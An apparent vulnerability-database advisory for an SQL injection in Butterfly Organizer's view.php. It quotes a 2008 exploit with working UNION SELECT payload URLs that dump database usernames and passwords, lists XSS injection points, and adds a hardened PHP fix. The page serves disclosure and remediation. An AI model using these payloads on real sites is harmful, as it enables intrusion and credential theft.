Butterfly Organizer 'view.php' SQL Injection Vulnerability

Vulnerability ID: 1115422
Vulnerability type: SQL injection
Published: 2008-06-13
Updated: 2009-02-27
CVE ID: CVE-2008-6311
CNNVD ID: CNNVD-200902-628
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/5797
https://www.securityfocus.com/bid/80774
https://cxsecurity.com/issue/WLB-2009030082
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-628
|Vulnerability details
Butterfly Organizer is a PHP/MySQL-based web user management solution. A SQL injection vulnerability exists in view.php in Butterfly Organizer 2.0.1. A remote attacker can execute arbitrary SQL commands via the mytable parameter. Note: the id vector is covered by a different CVE identifier.
|Vulnerability EXP
======================================================================
 Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
======================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE : 13 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : Butterfly Organizer
VERSION     : 2.0.0
DOWNLOAD    : www.butterflymedia.ro/downloads/organizer_2_0_0.zip
#####################################################

+++ Remote SQL Injection Exploit +++

----------------------------
 Vulnerable Code [view.php]
----------------------------
@Line

   26: $mytable = $_GET['mytable'];
   27: $id = $_GET['id'];
   28:
   29: $result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
   30: $myrow = mysql_fetch_array($result);


----------
 Exploit
----------
[+] http://[Target]/[Organizer_Path]/view.php?id=<SQL INJECTION>&mytable=test_category


-------------
 POC Exploit
-------------
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/mysql.user&mytable=test_category
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(username,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/test_category&mytable=test_category



+++ Remote XSS Exploit +++


-----------
 Exploits
-----------
[+] http://[Target]/[Organizer_Path]/view.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/viewdb2.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/category-rename.php?tablehere=<XSS>
[+] http://[Target]/[Organizer_Path]/module-contacts.php?letter=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-13]
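The root cause in the view.php lines quoted above is that both the table name and the id are concatenated into the query unchecked. As an added example (not code from the advisory or from the Butterfly Organizer project), here is a hardened replacement for that fragment: the table name is matched against a fixed allowlist (table names cannot be bound as prepared-statement parameters) and the id is validated as an integer and bound. The allowlist entries, the use of mysqli with mysqlnd, and the `$database` connection variable are assumptions.

```php
<?php
// Hardened rewrite of view.php lines 26-30 (added example, not project code).
// Assumed: $database is a mysqli connection; the table names below are
// placeholders standing in for the application's real tables.
$allowedTables = ['test_category', 'contacts', 'notes']; // assumed allowlist

function fetchRow(mysqli $db, array $allowedTables, string $mytable, string $id): ?array
{
    // 1. The table name must match an allowlisted name exactly (strict compare),
    //    so no user-supplied identifier ever reaches the query text.
    if (!in_array($mytable, $allowedTables, true)) {
        throw new InvalidArgumentException('unknown table');
    }

    // 2. The id must be a plain integer; FILTER_VALIDATE_INT rejects anything
    //    else, so a value carrying a UNION or comment sequence never reaches SQL.
    $intId = filter_var($id, FILTER_VALIDATE_INT);
    if ($intId === false) {
        throw new InvalidArgumentException('invalid id');
    }

    // 3. The table name is now a trusted literal; the id is a bound parameter.
    $stmt = $db->prepare('SELECT * FROM `' . $mytable . '` WHERE id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $intId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();

    return $row ?: null;
}

// Usage in place of the original lines 26-30 (assumed $database connection):
// $myrow = fetchRow($database, $allowedTables,
//                   $_GET['mytable'] ?? '', $_GET['id'] ?? '');
// Any field of $myrow echoed back into the page should pass through
// htmlspecialchars(), which also covers the reflected XSS in the same
// parameters that the advisory lists.
```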
|Affected products
Butterflymedia Butterfly Organizer 2.0.1
|References

Source: XF
Name: butterfly-mytable-sql-injection(49012)
Link: http://xforce.iss.net/xforce/xfdb/49012
Source: MILW0RM
Name: 7411
Link: http://www.milw0rm.com/exploits/7411
Source: SECUNIA
Name: 33086
Link: http://secunia.com/advisories/33086